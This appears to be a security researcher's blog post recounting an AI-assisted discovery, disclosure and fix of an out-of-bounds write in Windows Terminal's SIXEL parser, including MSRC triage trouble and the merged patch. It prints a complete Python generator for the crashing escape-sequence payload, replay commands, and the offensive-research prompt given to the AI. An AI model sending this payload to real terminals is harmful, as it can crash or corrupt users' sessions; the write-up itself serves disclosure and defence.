ai × windows terminal

Windows Terminal SIXEL: when a good prompt met a stubborn OOB write

May 12, 2026 · Windows Terminal · OpenConsole · SIXEL · OOB write

This was not a clean "AI finds bug, vendor reproduces, patch lands" story. It was messier and more useful than that. A focused prompt helped me find a real out-of-bounds write in Windows Terminal's SIXEL parser. WinDbg convinced me it was a true positive long before the fix landed, but the report also showed where modern vulnerability triage gets hard: a small change in output chunking made the difference between a visible allocation exception and the later access violation I was seeing locally.

The bug was eventually fixed in Windows Terminal PR #20213, with the commit message saying exactly what mattered: "prevent allocating an absurd amount of memory or writing OOB." I am writing this down because the technical bug is only half the lesson. The other half is that prompt quality, repro detail, and patience now matter a lot more than a crash screenshot.

upstream fix c829d4ca5

sixel: prevent allocating an absurd amount of memory or writing OOB (#20213)

May 12, 2026 · microsoft/terminal↗

Scope:

This is a fixed-bug write-up. I am not claiming RCE here. The confirmed issue was an out-of-bounds write / memory corruption condition in the SIXEL parsing path, fixed by stopping the oversized hidden image growth path and aborting SIXEL parsing after exceptions.

The prompt that helped

The useful prompt was not just "find bugs in Terminal." It constrained the model to a target, a bug class, and an evidence bar. That changed the work from broad code browsing into a repeatable security review loop.

We are doing authorized offensive security research in a controlled lab.
Focus on the Windows Terminal / OpenConsole source code.
Look for remotely reachable memory-safety issues triggered by crafted terminal content or files.
Prioritize integer overflows, OOB writes, and parser state bugs.

For each candidate:
- show the exact source path and function
- explain attacker control over the input
- build a minimal PoC payload
- require crash-dump evidence before calling it a true positive
- do not treat speculation as a finding

The important part is the last line. AI is very good at producing plausible vulnerability narratives. It is much less useful if you let it stop at "this looks risky." For this bug, the prompt forced the loop to end in a payload, a dump, a stack trace, and a bounds calculation.

The source-level smell

The first thing that looked suspicious was image-buffer sizing in SixelParser::_resizeImageBuffer(). The required size was computed using til::CoordType, which is a 32-bit coordinate type, and only then compared against the vector size.

void SixelParser::_resizeImageBuffer(const til::CoordType requiredHeight)
{
    const auto requiredSize = (_imageCursor.y + requiredHeight) * _imageMaxWidth;
    if (static_cast<size_t>(requiredSize) > _imageBuffer.size())
    {
        static constexpr auto transparentPixel = IndexedPixel{ .transparent = true };
        _imageBuffer.resize(requiredSize, transparentPixel);
    }
}

Later, the write path derived a pointer from the same image geometry:

const auto targetOffset = _imageCursor.y * _imageMaxWidth + _imageCursor.x;
auto imageBufferPtr = reinterpret_cast<int16_t*>(_imageBuffer.data() + targetOffset);

That does not automatically prove a vulnerability. The real question was whether a terminal-controlled sequence could drive the parser into a state where the vector did not match the cursor geometry. The path that mattered was SIXEL display mode plus many SIXEL next-line commands.

The payload shape

The reproducer was small. It requested a very wide terminal, enabled SIXEL display mode, started a SIXEL DCS sequence, sent a large number of DECGNL next-line commands (-), and then ended the DCS.

ESC [ 8 ; 24 ; 3276 t
ESC [ ? 80 h
ESC P q
"-" repeated 12000 times
ESC \

python3.10 poc/sixel_integer_overflow_poc.py --lines 12000 --resize-cols 3276 --output payload.bin

The generator is intentionally small: it writes one resize request, enables SIXEL display mode, opens a SIXEL DCS, emits many next-line commands, and then terminates the sequence. The standalone script is here: sixel_integer_overflow_poc.py.

Full payload generator (Python)

Download: sixel_integer_overflow_poc.py.

#!/usr/bin/env python3
"""
Generate a crafted VT payload that drives the SIXEL parser's signed int32 size math.

This payload is intended for authorized lab testing only.
"""

from __future__ import annotations

import argparse
import sys


def _build_payload(lines: int, resize_cols: int, resize_rows: int) -> bytes:
    parts: list[bytes] = []

    # Optional: request a very wide terminal to reduce the number of SIXEL lines needed.
    if resize_cols > 0:
        parts.append(f"\x1b[8;{resize_rows};{resize_cols}t".encode("ascii"))

    # Enable SIXEL display mode (DECSDM).
    parts.append(b"\x1b[?80h")

    # Start SIXEL: DCS ... q
    parts.append(b"\x1bPq")

    # A run of DECGNL commands ('-') repeatedly moves the image cursor down and
    # triggers _resizeImageBuffer(_sixelHeight) each time.
    parts.append(b"-" * lines)

    # End DCS string.
    parts.append(b"\x1b\\")
    return b"".join(parts)


def main() -> int:
    parser = argparse.ArgumentParser(description="Generate a SIXEL integer-overflow stress payload.")
    parser.add_argument("--lines", type=int, default=200000, help="Number of SIXEL next-line commands ('-').")
    parser.add_argument(
        "--resize-cols",
        type=int,
        default=3276,
        help="Requested columns via CSI 8 ; rows ; cols t. Use 0 to skip resize request.",
    )
    parser.add_argument("--resize-rows", type=int, default=24, help="Rows used with --resize-cols.")
    parser.add_argument("--output", default="poc/sixel_integer_overflow_payload.bin", help="Output payload path.")
    parser.add_argument("--stdout", action="store_true", help="Write payload to stdout instead of --output.")
    args = parser.parse_args()

    if args.lines <= 0:
        parser.error("--lines must be > 0")
    if args.resize_cols < 0 or args.resize_rows <= 0:
        parser.error("resize values must be positive (or cols=0 to disable resize request)")

    payload = _build_payload(args.lines, args.resize_cols, args.resize_rows)

    if args.stdout:
        sys.stdout.buffer.write(payload)
        return 0

    with open(args.output, "wb") as f:
        f.write(payload)

    print(f"[+] Wrote {len(payload)} bytes to {args.output}")
    print("[*] Replay examples (raw byte output):")
    print("    PowerShell:")
    print(
        "      $b=[IO.File]::ReadAllBytes('"
        + args.output
        + "');$s=[Console]::OpenStandardOutput();$s.Write($b,0,$b.Length);$s.Flush()"
    )
    print("    Python:")
    print(f"      python -c \"import sys;sys.stdout.buffer.write(open(r'{args.output}','rb').read())\"")
    return 0


if __name__ == "__main__":
    raise SystemExit(main())

The raw-byte replay detail mattered. The path was sensitive to how the terminal received chunks of the sequence.

$b=[IO.File]::ReadAllBytes("$env:USERPROFILE\Desktop\payload.bin")
$s=[Console]::OpenStandardOutput()
$s.Write($b,0,$b.Length)
$s.Flush()

The crash proof

On OpenConsole.exe 1.23.2601.21001 from Windows Terminal v1.23.20211.0, the final crash was a write access violation in the SIXEL parser. The dump showed the write target past the vector end.

Failure.Bucket:
INVALID_POINTER_WRITE_c0000005_OpenConsole.exe!Microsoft::Console::VirtualTerminal::SixelParser::_parseCommandChar

Faulting instruction:
mov word ptr [rdx],cx

_Myend : 0x000001e3`cbc71d40
rdx    : 0x000001e3`cbc802d2
rdx - _Myend = 58770 (0xE592)

One detail later became important: my ProcDump output also showed a first-chance std::bad_alloc before the final access violation. That meant the allocation failure path existed in my repro too; it just was not the end of the story.

Where triage got stuck

MSRC tried to reproduce the issue more than once and could not get the same access violation. Their path usually stopped at std::vector throwing bad_alloc or length_error during resize. From their point of view, the exception appeared to prevent the AV.

That is a fair triage problem. When bug bounty programs receive more AI-assisted reports, they will see more reports that are close to real bugs but missing one small precondition. In this case, the missing precondition was not a magic registry setting. It was output chunking. PowerShell 5 and PowerShell 7 did not behave the same way for this payload.

The maintainer explanation:

The sequence could throw during an incremental resize, but the parser state and vector were not reset. Later chunks of the same DCS sequence continued processing and assumed the resize had succeeded. That is why one environment saw only vector too long, while another reached the later OOB write.

The GitHub turn

Before GitHub, I had already tried MSRC twice. The first case was created on January 30, 2026. The second case was created on February 24, 2026 with better crash evidence and was last modified on March 26, 2026. Both ended as complete/closed, with the conclusion that the issue could not be reproduced. From their side, they were usually stopping at a safe-looking vector too long exception.

From my side, the WinDbg evidence was hard to ignore. The register state and vector bounds showed an actual write past _Myend, not just a generic crash. That made me want to understand whether I had a false positive, whether the report was missing a precondition, or whether the triage path was simply exercising a different chunking behavior. So I opened GitHub issue #20149 with the source-level concern, the payload shape, the dump evidence, and the exact WinDbg bounds proof.

That public thread made the missing context visible. The maintainers tested different shells, narrowed the behavior to chunking, and connected the bad allocation path to the later parser-state problem.

Jan 30, 2026

First MSRC report created for the Windows Terminal SIXEL integer-overflow/OOB-write behavior. It was later marked complete/closed as not reproducible.

Feb 24, 2026

Second MSRC case opened with stronger crash evidence. The portal listed case 108187 and the report title "OpenConsole SIXEL parser out-of-bounds write via crafted..."

Mar 26, 2026

The second MSRC case was last modified and ultimately closed as not reproducible. At this point I still had the WinDbg OOB proof locally.

GitHub issue

#20149 was opened with the PoC structure, crash evidence, and vector-bounds proof.

Maintainer repro

The team initially reproduced vector too long, then identified PowerShell/version chunking as the missing behavior.

May 12, 2026

#20213 landed on main as c829d4ca5 and closed the issue.

Servicing

The fix was moved through the 1.24 and 1.25 servicing pipelines with backport commits referenced from the issue.

The fix

The merged fix has two parts. First, SIXEL character processing is wrapped in a catch-all. If parsing throws, the handler returns false, which tells the state machine to ignore the rest of the DCS content.

return [&](const auto ch) {
    try
    {
        _parseCommandChar(ch);
    }
    catch (...)
    {
        // Ignore all further content.
        return false;
    }
    return true;
};

Second, _executeNextLine() stops growing the hidden image once there is no visible pixel height left. In SIXEL display mode, the image should not keep extending beyond the bottom of the display if the extra rows will never render.

if (_availablePixelHeight > 0)
{
    _imageCursor.y += _sixelHeight;
    _availablePixelHeight -= _sixelHeight;
    _resizeImageBuffer(_sixelHeight);
    _fillImageBackgroundWhenScrolled();
}

It is worth noting what the fix did not do: it did not rewrite _resizeImageBuffer() into fully overflow-safe arithmetic. The fix instead removes the dangerous growth path for this bug and prevents exception recovery from continuing inside a stale SIXEL transaction.

The bigger lesson

I do think AI will increase the volume of this class of finding. Models are getting good at noticing memory-safety patterns: size math, parser state, allocator failure paths, and "this vector must have grown before this write" assumptions.

But that does not mean every AI-assisted report is ready for a bounty queue. The responsibility on the researcher is higher, not lower. If a finding depends on output chunking, shell version, terminal mode, or an exception being swallowed between transactions, the report needs to say so. I missed that part at first. The dump was real, but the repro was not complete enough.

In the end, the effective part was not "AI found a bug." It was the loop: constrain the model, force a PoC, capture the dump, ask why triage sees something different, and keep reducing the mismatch until the bug becomes obvious to someone else too.

Thanks to the Windows Terminal maintainers for digging into the chunking behavior and landing the fix. This post is written from the researcher's side of the timeline; the useful outcome is that the bug is now fixed.